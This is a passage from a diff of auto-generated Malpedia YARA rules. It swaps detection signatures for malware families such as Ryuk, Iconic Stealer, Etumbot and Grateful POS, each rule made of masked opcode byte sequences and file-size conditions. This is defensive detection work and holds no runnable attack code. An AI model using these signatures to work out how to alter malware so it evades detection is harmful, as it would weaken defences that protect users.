"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vapor_rage_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qadars_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "be731f13a1ff78238c54efa2479336e60a09907f2a709db9a3ea573dd84f70f8" + logic_hash = "3d2af7ca0745a690ff7b2f329cb25b898b4988f89dfff4953c93c63e52507d01" score = 75 quality = 75 tags = "FILE" @@ -137125,34 +139877,40 @@ rule MALPEDIA_Win_Vapor_Rage_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a07 e8???????? e8???????? e8???????? e8???????? 8325????????00 c745fcfeffffff } - $sequence_1 = { 6a00 0fb755b0 52 8b45ac 50 } - $sequence_2 = { 5f 5e c3 68???????? ff15???????? c3 } - $sequence_3 = { 32db 885de7 c745fcfeffffff e8???????? 84db 0f8564ffffff } - $sequence_4 = { 885de7 c745fcfeffffff e8???????? 84db 0f8564ffffff e8???????? } - $sequence_5 = { 6a1f 8b4de4 51 ff15???????? } - $sequence_6 = { 8b55f8 81ca80000000 8955f8 6a04 8d45f8 50 6a1f } - $sequence_7 = { eb59 48 a3???????? e8???????? } - $sequence_8 = { 894df8 8b55f8 81ca80000000 8955f8 6a04 8d45f8 } - $sequence_9 = { f2c3 f2e94e030000 55 8bec 5d e9???????? 55 } + $sequence_0 = { 48 c7048100000000 75f4 8b06 } + $sequence_1 = { 8b4d10 8939 5f 8bc6 5e 5b } + $sequence_2 = { 747a 8b45fc 3b4604 7650 33c9 } + $sequence_3 = { 33c9 8908 894804 53 8b5d0c 8b4308 56 } + $sequence_4 = { 83e940 0f8589040000 bb???????? 8b701c } + $sequence_5 = { 33c0 6808020000 50 8d8de6fdffff 51 668985e4fdffff e8???????? } + $sequence_6 = { 894608 85c0 75ee eb32 85db } + $sequence_7 = { ff470c 8d4dc4 8955d0 e8???????? 8b75f4 } + $sequence_8 = { 6a00 8d4df4 51 6a04 8d55f8 } + $sequence_9 = { 6a01 6a08 ff15???????? 83c408 } + $sequence_10 = { 6a01 8b55fc 52 ff15???????? 83c408 } + $sequence_11 = { 83c40c 6805010000 8d8df8feffff 51 } + $sequence_12 = { 51 8b55f0 52 ff15???????? 83c40c } + $sequence_13 = { 83c408 6a09 8d4dc4 51 8b5518 } + $sequence_14 = { 83c408 837de000 740c 8b4de0 } + $sequence_15 = { 83c408 837df800 747f 8b4df8 } condition: - 7 of them and filesize <296960 + 7 of them and filesize <630784 } -rule MALPEDIA_Win_Ryuk_Auto : FILE +rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9762637f-3260-5c34-b846-45fb6634f5b4" + id = "152db8f5-915a-5ca5-a7d4-f3818a40ffaf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ryuk_auto.yar#L1-L425" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.iconic_stealer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "b1841a1134c1a11658d85f36006ba9e8e5ed64f6492350418145712079afb53f" + logic_hash = "dec19b483e0961df8b3ae7026df8b4a85577bd9230fffbf8dd9f39001dd5f48b" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -137164,69 +139922,32 @@ rule MALPEDIA_Win_Ryuk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 6a01 6a00 6814010000 } - $sequence_1 = { ff15???????? 85c0 7508 6a01 ff15???????? 68???????? 6a01 } - $sequence_2 = { 6a08 6a18 68???????? 68???????? 68???????? ff15???????? } - $sequence_3 = { 754c b90b010000 66398818000035 753e 8b4508 b9???????? 2bc1 } - $sequence_4 = { 68???????? ff15???????? 85c0 7578 6a10 6a18 } - $sequence_5 = { 755d a1???????? 81b8????????50450000 754c b90b010000 66398818000035 } - $sequence_6 = { 68???????? ff15???????? 85c0 7542 6a28 6a18 } - $sequence_7 = { 68c0cf6a00 ff15???????? 6a01 ff15???????? } - $sequence_8 = { 7407 b801000000 eb0b eb04 } - $sequence_9 = { e8???????? 68e8030000 ff15???????? 68???????? e8???????? } - $sequence_10 = { 720f b901000000 6bd103 8b45fc c6041000 } - $sequence_11 = { 83c101 ba01000000 d1e2 8b45fc } - $sequence_12 = { 8908 895004 837df800 7709 } - $sequence_13 = { 89459c 8955a0 8b55a0 3b55f8 0f870b020000 } - $sequence_14 = { ba01000000 6bc203 8b55fc 880c02 b804000000 } - $sequence_15 = { ff15???????? b811000000 e9???????? e9???????? } - $sequence_16 = { ff15???????? 833d????????00 6a10 6a18 } - $sequence_17 = { 6a00 6814010000 ff7508 ff35???????? } - $sequence_18 = { 7407 48 85c0 7ff0 } - $sequence_19 = { ff15???????? b803000000 eb05 b805000000 } - $sequence_20 = { 2bf0 33c0 66890473 83ffff } - $sequence_21 = { 751b ff35???????? ff35???????? 6a01 68???????? e8???????? } - $sequence_22 = { eb0b 8bc1 99 f7fe } - $sequence_23 = { 56 ff15???????? 8bcb 8d5102 } - $sequence_24 = { 7714 7212 81f9d0070000 770a 85d2 } - $sequence_25 = { e8???????? e8???????? b9e8030000 ff15???????? } - $sequence_26 = { 668b02 83c202 6685c0 75f5 8d7bfe 2bd6 } - $sequence_27 = { 0f9fc0 5d c3 8bff 55 8bec 8b4508 } - $sequence_28 = { 5d c3 8bcb 8d5102 } - $sequence_29 = { d1fa 2bca 33c0 6689444bfe e9???????? 33c0 } - $sequence_30 = { 488bc3 4883c430 5b c3 48895c2408 48896c2410 4889742418 } - $sequence_31 = { 68???????? 53 d1fe e8???????? 83c408 8d5002 } - $sequence_32 = { 498bc1 c3 4053 4883ec20 8bc1 498bd8 } - $sequence_33 = { 50 51 e8???????? 6a00 6840420f00 52 50 } - $sequence_34 = { 83c602 6685c9 75f5 2bf2 68???????? 53 } - $sequence_35 = { f3a4 8d7afe 668b4702 8d7f02 6685c0 75f4 a1???????? } - $sequence_36 = { 4883c428 c3 48895c2408 57 4883ec30 8364242000 } - $sequence_37 = { 33c9 ba10270000 41b800100000 448d4904 ff15???????? } - $sequence_38 = { f7e1 8bc1 2bc2 d1e8 03c2 c1e806 6bc05a } - $sequence_39 = { ff15???????? 41b900300000 c744242040000000 448bc3 488bd6 488bcf } - $sequence_40 = { c744242802000000 4533c9 4533c0 c744242002000000 ba000000c0 } - $sequence_41 = { ff15???????? 488bd8 ff15???????? 83f820 7510 488bcb ff15???????? } - $sequence_42 = { 4533c9 4533c0 c744242003000000 ba00000040 ff15???????? 488bd8 ff15???????? } - $sequence_43 = { 66837f0254 750f 66837f0641 7508 } - $sequence_44 = { 4889442420 4c8bc6 488bd3 488bcf ff15???????? } - $sequence_45 = { ff15???????? 66833f4e 7516 66837f0254 750f } - $sequence_46 = { 84c0 746c e8???????? 488d0d63080000 e8???????? e8???????? } + $sequence_0 = { e9???????? 4c8b13 4c8d05e6c60300 488bc6 488bce 83e03f 48c1f906 } + $sequence_1 = { eb29 488d0c76 8d4601 898790000000 488b8788000000 c704c876000000 8954c804 } + $sequence_2 = { 894338 66897318 66894b3e 6644896316 6644894b3c 663bf1 0f85dc000000 } + $sequence_3 = { e8???????? 4881c430020000 415f 415d 415c 5f 5e } + $sequence_4 = { 5f 5e 5d c3 40f6c504 7419 4c8bc7 } + $sequence_5 = { eb05 b901000000 894f28 4885db 741f 8b4f28 48895f10 } + $sequence_6 = { f2490f2ad5 488d4dc7 f20f5e15???????? 66490f7ed0 e8???????? e9???????? 448b44242c } + $sequence_7 = { ffc7 4883c108 3bfa 7cf1 e9???????? 488b4b20 4885c9 } + $sequence_8 = { e9???????? 488b75a8 4c8b442470 8b06 83c003 413b00 7e1f } + $sequence_9 = { c7430400000000 41ba1f000000 49bb1142082184104208 418b49f8 85c9 745b 8d4701 } condition: - 7 of them and filesize <7450624 + 7 of them and filesize <2401280 } -rule MALPEDIA_Win_Unidentified_037_Auto : FILE +rule MALPEDIA_Win_Nymaim2_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9e4cd69e-744d-5d0c-b193-3d15e535bfdb" + id = "cd5e7949-7b9c-5324-8001-074a99f4915b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_037_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nymaim2_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ab9d444ded76b509036904b157e446e552ae52ed50151a488fb9c47db68bb4eb" + logic_hash = "37921c250fe69562f60d707b47002bf6c0dd5723b18e1c13d6bd87f6fbea9446" score = 75 quality = 75 tags = "FILE" @@ -137240,34 +139961,34 @@ rule MALPEDIA_Win_Unidentified_037_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 a3???????? 740c 8b4c2408 8b542404 51 52 } - $sequence_1 = { 33c0 33d2 33ff 8a0c1f 80f920 7405 80f930 } - $sequence_2 = { 7506 8b15???????? 8d8424b8040000 52 50 ff15???????? } - $sequence_3 = { 8a56ff 83e23f 41 4d 8a82d00c0110 8841ff 759c } - $sequence_4 = { 8b4d20 8b5500 8b4504 8bb424f0040000 51 52 50 } - $sequence_5 = { ff15???????? 84c0 742d 8b4608 8b5604 8d8dccfcffff } - $sequence_6 = { 8841ff 759c 5d eb04 8b742410 85ff 7667 } - $sequence_7 = { 743e 80f920 7439 80f930 7c0d 80f937 7f08 } - $sequence_8 = { 8b5c2408 8b4314 83f8ff 0f84b1000000 c1e005 8bd0 a1???????? } - $sequence_9 = { 5e 8b8c241c100000 64890d00000000 81c428100000 c3 83c1fe } + $sequence_0 = { e8???????? 8d4de4 c645fc45 e8???????? 8d4de0 c645fc05 e8???????? } + $sequence_1 = { e8???????? 83ec20 56 33f6 3935???????? 7546 68da010000 } + $sequence_2 = { 50 8d45f0 50 e8???????? e8???????? 834dfcff 8d4df0 } + $sequence_3 = { e8???????? 8b7510 59 59 8b16 50 8bce } + $sequence_4 = { c645fc46 e8???????? 8d4de4 c645fc1b e8???????? 8d4ddc e8???????? } + $sequence_5 = { 8d45d4 8bce 50 c645fc01 e8???????? 8d45c0 8d4dd4 } + $sequence_6 = { 56 8bcf c645fc09 ff5008 51 8d4604 8bcc } + $sequence_7 = { 8d4df0 e9???????? 8d4dc0 e9???????? 8d4dec e9???????? 8b45e8 } + $sequence_8 = { 8d86640c0000 8bd9 03c9 c1eb1f 0bd9 c746040e000000 33da } + $sequence_9 = { 8bc8 c645fc03 e8???????? 51 8bcc 8965ec 50 } condition: - 7 of them and filesize <167936 + 7 of them and filesize <753664 } -rule MALPEDIA_Win_5T_Downloader_Auto : FILE +rule MALPEDIA_Win_Etumbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fe4393a3-e3cd-5e60-a348-fa50df874e7a" + id = "73e6da41-e3d5-504c-8c80-6f8ec05bab3e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.5t_downloader_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.etumbot_auto.yar#L1-L332" license_url = "N/A" - logic_hash = "708a5991b6f83db848239b1110cc9bc587325f0c0450305b55a83b6de5bbd18e" + logic_hash = "564ae417565d87b67b974a9ba2ad8948ae9936f9dac5ee557fc27d8a92da27f9" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -137279,32 +140000,59 @@ rule MALPEDIA_Win_5T_Downloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7409 83781800 7403 5d } - $sequence_1 = { 85c9 7409 83781800 7403 5d } - $sequence_2 = { 85c9 7409 83781800 7403 } - $sequence_3 = { 85c0 7416 83781400 7510 } - $sequence_4 = { 85c9 7409 83781800 7403 5d ffe1 83c8ff } - $sequence_5 = { 8b4508 85c0 7416 83781400 7510 } - $sequence_6 = { 55 8bec 8b4508 85c0 7416 83781400 7510 } - $sequence_7 = { 85c9 7409 83781800 7403 5d ffe1 } - $sequence_8 = { 7409 83781800 7403 5d ffe1 83c8ff } - $sequence_9 = { 8bec 8b4508 85c0 7416 83781400 7510 } + $sequence_0 = { 8811 8a00 02c2 0fb6c0 8a8405fcfeffff 320437 8806 } + $sequence_1 = { 8bec 53 56 57 8b3d???????? ffd7 } + $sequence_2 = { 7407 8bf9 c1ef18 33c7 f7d1 23c1 } + $sequence_3 = { c745ac5c5c4d69 c745b063726f73 c745b46f66745c c745b85c57696e } + $sequence_4 = { c1e004 03c1 8bc8 81e1000000f0 7407 8bf9 } + $sequence_5 = { 8d45f4 6820a10700 50 68???????? 68???????? } + $sequence_6 = { c745c05c5c4375 c745c47272656e c745c874566572 c745cc73696f6e c745d05c5c496e } + $sequence_7 = { 42 4e 75df 5f } + $sequence_8 = { ffd7 8b7508 8bd8 69f660ea0000 } + $sequence_9 = { c745b46f66745c c745b85c57696e c745bc646f7773 c745c05c5c4375 } + $sequence_10 = { 57 0fbe38 33f6 33db } + $sequence_11 = { c745d47465726e c745d865742053 c745dc65747469 c745e06e677300 } + $sequence_12 = { f7d1 23c1 42 4e } + $sequence_13 = { ffd7 2bc3 3bc6 72ed } + $sequence_14 = { c645bf69 c645c062 c645c16c c645c265 } + $sequence_15 = { 80e10f c0e102 c0eb06 02cb } + $sequence_16 = { c645c16c c645c265 c645c33b c645c420 } + $sequence_17 = { 56 8bf1 8b08 83f903 } + $sequence_18 = { c645c54d c645c653 c645c749 c645c845 c645c920 } + $sequence_19 = { 84c9 74b6 5f 5e 8bc2 } + $sequence_20 = { 33c0 56 89442418 57 89442420 } + $sequence_21 = { 0345f0 8b4d08 034dec 8a11 8810 8b45f0 83c001 } + $sequence_22 = { 750d 83c01c 8bce 50 e8???????? } + $sequence_23 = { 8d4a01 83c404 8bd1 c1e902 f3ab 8bca 83e103 } + $sequence_24 = { 83c204 3b5514 7608 83c8ff } + $sequence_25 = { 83c104 3b4d14 7608 83c8ff } + $sequence_26 = { 53 57 e8???????? 8d86b0000000 50 } + $sequence_27 = { 034df0 8b5508 0355ec 8a02 } + $sequence_28 = { 52 e8???????? 83c404 e9???????? 6a05 } + $sequence_29 = { c645d057 c645d169 c645d26e c645d364 } + $sequence_30 = { 6a00 68???????? 6a00 6a00 6a00 51 68???????? } + $sequence_31 = { 83fa01 7538 8b4514 8b19 0fb60438 c1e802 } + $sequence_32 = { 46 eb0f 0fb6d2 f68201ce400004 7403 40 ff01 } + $sequence_33 = { 8b4d08 83c101 894d08 8b550c 83ea03 } + $sequence_34 = { 50 57 8bce e8???????? 8d45f0 8d7e70 } + $sequence_35 = { c68543fffffff7 c68544ffffff52 c68545ffffff91 c68546ffffff1c c68547fffffff7 c68548ffffff64 c68549ffffffa3 } + $sequence_36 = { c685ddfdffffa4 c685defdffffb3 c685dffdffff02 c685e0fdffff30 c685e1fdffffd6 c685e2fdfffffb } condition: - 7 of them and filesize <539648 + 7 of them and filesize <450560 } -rule MALPEDIA_Win_Wannahusky_Auto : FILE +rule MALPEDIA_Win_Qaccel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b2ad3b67-4e34-5409-83f1-3168450902fa" + id = "1dd927f1-4f29-5825-9031-a85900b0d7a3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wannahusky_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qaccel_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "77e82dda4e107ad0b0d473cd2e43d110eacdad7445bdb06e12858f482aa9bc9d" + logic_hash = "fe81ee4455e2d861af0930707bfdb209646482eb98d90e9c040e2aaf3beb1c92" score = 75 quality = 75 tags = "FILE" @@ -137318,32 +140066,32 @@ rule MALPEDIA_Win_Wannahusky_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb0c 3d00010000 19c9 f7d1 83e108 d3e8 0fbe80e0184100 } - $sequence_1 = { c7442404ffffffff c7042400000000 e8???????? 89d9 } - $sequence_2 = { 8b08 e8???????? 84c0 7449 c78554fbffff00000000 a1???????? } - $sequence_3 = { 7405 8b08 83c11a e8???????? ba???????? e8???????? } - $sequence_4 = { e9???????? 8b4dc0 394dbc 7212 } - $sequence_5 = { 66c705????????1101 c605????????01 c705????????2c000000 c705????????80ba4100 c705????????0c1e4100 } - $sequence_6 = { 8d57ff 89542404 e8???????? 8b45bc 8b4db8 } - $sequence_7 = { 89c1 58 5b 5d e9???????? 55 } - $sequence_8 = { c705????????78b54100 c705????????00000000 c705????????04000000 c705????????04000000 } - $sequence_9 = { c705????????14000000 c705????????00484200 c705????????b41d4100 c705????????30b54100 c705????????00000000 c705????????04000000 } + $sequence_0 = { 68???????? 50 64892500000000 56 57 8bf9 0f8816000000 } + $sequence_1 = { 5f 5f 5f 5f 5f b801000000 5e } + $sequence_2 = { 53 03c6 51 50 c7450c00000000 } + $sequence_3 = { 83cbff 0f8819000000 0f8913000000 5f 5f 5f 5f } + $sequence_4 = { 8b4020 6a05 50 ffd6 50 e8???????? 8b4820 } + $sequence_5 = { 8d55e8 51 52 ff15???????? 8b45fc 8b4df8 6a00 } + $sequence_6 = { 50 ffd6 50 e8???????? 0fbe4dff 8b5020 6801001c00 } + $sequence_7 = { 5f 5f 5f 68???????? ff15???????? 85c0 } + $sequence_8 = { 5f 5f 5f 5f 6a00 50 } + $sequence_9 = { 5f 5f 5f 66a1???????? 8b3d???????? 6800010000 668903 } condition: - 7 of them and filesize <862208 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Juicy_Potato_Auto : FILE +rule MALPEDIA_Win_Grateful_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "03dfaa0e-28b0-58bd-8b17-d8d3c88d86a7" + id = "142dbaaf-bae9-512b-8e1e-de26b0ad1d45" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.juicy_potato_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grateful_pos_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "270473eb74e147cca3eabdeead641e5c572494e923c2e4deeae8d94ea8e99f5c" + logic_hash = "bd00e16b742e3f98f3581779e2ac022b9c7b51a75c5cf9f592cacfe60dca60a5" score = 75 quality = 75 tags = "FILE" @@ -137357,32 +140105,38 @@ rule MALPEDIA_Win_Juicy_Potato_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b5010 498b4910 48ffc9 488bc2 48d1e8 4823c8 } - $sequence_1 = { 4053 4883ec20 488bd9 488bc2 488d0dade40100 48890b 488d5308 } - $sequence_2 = { 488d5e08 488b03 6683382d 0f8598010000 0fb74002 83c09f } - $sequence_3 = { 4889450f 4883c8ff 488955ff 488bc8 } - $sequence_4 = { 488bd7 4c8d05dec60300 83e23f 488bcf 48c1f906 48c1e206 498b0cc8 } - $sequence_5 = { 48894728 4883f8ff 7437 448b4310 488b5320 488bc8 ff15???????? } - $sequence_6 = { e8???????? ff15???????? b801000000 e9???????? 488b5c2438 4885db 7470 } - $sequence_7 = { 488d15159c0100 ff15???????? 4885c0 0f8429030000 488bc8 e8???????? 488bcb } - $sequence_8 = { 7509 488d056f200400 eb04 4883c024 8938 e8???????? 488d1d57200400 } - $sequence_9 = { ff15???????? ba10000000 663bc2 7312 488bd3 488d0d6df80200 ff15???????? } + $sequence_0 = { eb07 b8fcffffff eb02 33c0 } + $sequence_1 = { 7407 b8f6ffffff eb02 33c0 } + $sequence_2 = { e8???????? 99 b980ee3600 f7f9 } + $sequence_3 = { 7411 e8???????? e8???????? 33c0 e9???????? } + $sequence_4 = { e8???????? 83f801 7510 e8???????? e8???????? } + $sequence_5 = { eb1a b8fdffffff eb13 b8fcffffff } + $sequence_6 = { 8bb5f4fffdff 03b5f8fffdff c1ee03 8b4508 8b7810 } + $sequence_7 = { 6810040000 ff15???????? 8985f4fbffff 83bdf4fbffff00 0f8488010000 8a0d???????? } + $sequence_8 = { 83fa7b 750a 6a01 e8???????? } + $sequence_9 = { 8b4dfc 894110 8b550c 8b420c c1e803 50 } + $sequence_10 = { c745fcffffffff 8d45f4 64a300000000 c3 6a03 e8???????? 59 } + $sequence_11 = { 7c62 8b8df8fffdff 0fb6940dfefffdff 83fa3a 7d4f 8b85f8fffdff } + $sequence_12 = { 6bc02a 05???????? 50 e8???????? 83c40c 85c0 7509 } + $sequence_13 = { 85c0 0f84b2000000 6a03 68???????? 8b8de0fbffff 83e90e } + $sequence_14 = { 8884248e010000 b801000000 486bc03f 488d0d79e50100 0fbe0401 83f04d 8884248f010000 } + $sequence_15 = { 488bcd 418bd7 e8???????? 33c9 85c0 0f85bb010000 4c8d35ee481900 } condition: - 7 of them and filesize <736256 + 7 of them and filesize <3964928 } -rule MALPEDIA_Win_Prestige_Auto : FILE +rule MALPEDIA_Win_Yayih_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "554de8b7-e6ad-5535-8c14-f95b90ec653d" + id = "ad6edea8-11c9-5fa2-96f2-3800b1bd4695" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prestige_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yayih_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "3d9139c6507e377e5a1b52cf299e6f205e8499ed341925da786360ebd802ec9b" + logic_hash = "d13e6780f7fe46f9387338ccdb35700eb9e8a8c2ac7c13f232d1064c9386ae55" score = 75 quality = 75 tags = "FILE" @@ -137396,32 +140150,32 @@ rule MALPEDIA_Win_Prestige_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894648 8b7a4c 897e4c 837a4c10 7706 } - $sequence_1 = { 03f3 c706652b3030 8d4604 33d2 e9???????? 8bd1 c745c409000000 } - $sequence_2 = { 83f826 7603 6a26 58 0fb60c85be534700 0fb63485bf534700 } - $sequence_3 = { b9fe020000 3bc1 0f4fc1 8d8decfcffff 50 8985e8fcffff e8???????? } - $sequence_4 = { 3bf0 730a 8bc6 89742410 897c2414 50 ff7508 } - $sequence_5 = { 8d45fc 50 8bd6 e8???????? 8b7508 8bf8 59 } - $sequence_6 = { 8bf2 57 8bf9 8d4e02 668b06 83c602 6685c0 } - $sequence_7 = { 85c0 740c 8d432c 8945f8 8b00 } - $sequence_8 = { 8945d8 8b45e8 5e 13ce f765e0 6a00 8945ec } - $sequence_9 = { 59 c3 8b4c240c 68???????? e8???????? 8b44240c 5e } + $sequence_0 = { 5f ff7508 ff55f4 53 ff15???????? 8bc7 } + $sequence_1 = { 68???????? e8???????? 8b35???????? 83c40c 50 57 } + $sequence_2 = { 50 56 e8???????? 59 85c0 59 753c } + $sequence_3 = { 85c0 59 7507 57 e8???????? 59 e8???????? } + $sequence_4 = { ff15???????? 56 6880000000 6a03 56 6a01 8d85b8b8ffff } + $sequence_5 = { 66ab aa 59 33c0 8dbde9faffff 889de8faffff f3ab } + $sequence_6 = { 3bfe 750a 56 56 56 6a08 } + $sequence_7 = { e8???????? 6801200000 8d85b8b8ffff 56 50 e8???????? } + $sequence_8 = { 50 8d854cf6ffff 50 e8???????? 83c430 8d459c 50 } + $sequence_9 = { 0fafca 0fb65002 03ca 890d???????? 0fb64803 69c960ea0000 } condition: - 7 of them and filesize <1518592 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Onhat_Auto : FILE +rule MALPEDIA_Win_Ransoc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59032243-71bc-5ccf-a304-ec07259d2d04" + id = "961c0c93-e6c6-5111-8367-8742ed436406" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.onhat_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ransoc_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "0a14e4700b595808dab4fc1d09b95f2e90fdba52a26f4d889c5bc554e4997af3" + logic_hash = "2d366ed2132c1270c1bab4c471d75e367a89089f653123f697fac204fd95b124" score = 75 quality = 75 tags = "FILE" @@ -137435,32 +140189,32 @@ rule MALPEDIA_Win_Onhat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? e8???????? 83c404 b806000080 5f 5e 5d } - $sequence_1 = { c684242c01000048 889c242d010000 c684242e01000045 c684242f0100004e } - $sequence_2 = { 8d7c2414 bee8030000 f3ab 8b8c2424010000 b8d34d6210 f7e1 c1ea06 } - $sequence_3 = { 88542408 f3ab 8b8c240c200000 88542406 66ab aa 8d842410200000 } - $sequence_4 = { 57 32d2 b9ff070000 33c0 8d7c2409 88542408 } - $sequence_5 = { 53 ff15???????? 8bf0 3bf3 7526 } - $sequence_6 = { 33c9 8a4c2432 8ac7 52 50 c1eb18 51 } - $sequence_7 = { 8d7710 6a00 8d842424010000 56 50 51 e8???????? } - $sequence_8 = { 8d54241c 55 55 52 68???????? 55 55 } - $sequence_9 = { c644242852 c644242955 885c242a c644242b41 c644242c44 c644242d44 c644242e52 } + $sequence_0 = { 8b573c 50 57 ffd2 ff4e3c 8b462c 8b4e3c } + $sequence_1 = { 8bf0 8b5630 57 8d7e30 } + $sequence_2 = { 894240 8b5040 895140 3bd7 741e } + $sequence_3 = { 89703c 8b5134 895030 3bd7 7406 8b5134 } + $sequence_4 = { 85c0 75f2 8b7140 85f6 758b 68???????? } + $sequence_5 = { 740f 83f907 740a 83f906 } + $sequence_6 = { 89462c a820 7406 8b4604 014804 8b462c a900080000 } + $sequence_7 = { 895148 8b4830 85c9 7406 8b5034 895134 8b4834 } + $sequence_8 = { 83c408 c3 6a00 6a01 55 } + $sequence_9 = { 8b56e4 89542414 8d5c2410 891a 89442410 8b5004 8956e4 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <958464 } -rule MALPEDIA_Win_Rhysida_Auto : FILE +rule MALPEDIA_Win_Appleseed_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "64a6dc82-3050-56af-987a-eca5c9c0ccdc" + id = "5111027d-aef3-530a-baef-816a96e705d5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rhysida_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.appleseed_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "c700e285aaa62eb845c4c4a22ba3b4990a79a21d47e9845ba892bd45fa758d74" + logic_hash = "a810d449fba9d18767008ae79deb61edb7dc0a7b0fedfb1cf50aff52e06540b9" score = 75 quality = 75 tags = "FILE" @@ -137474,32 +140228,32 @@ rule MALPEDIA_Win_Rhysida_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ba28000000 4889c1 e8???????? 8945f8 837df800 7407 b804000000 } - $sequence_1 = { 4863d0 488b4510 4801d0 0fb600 0fb6c0 8b55f4 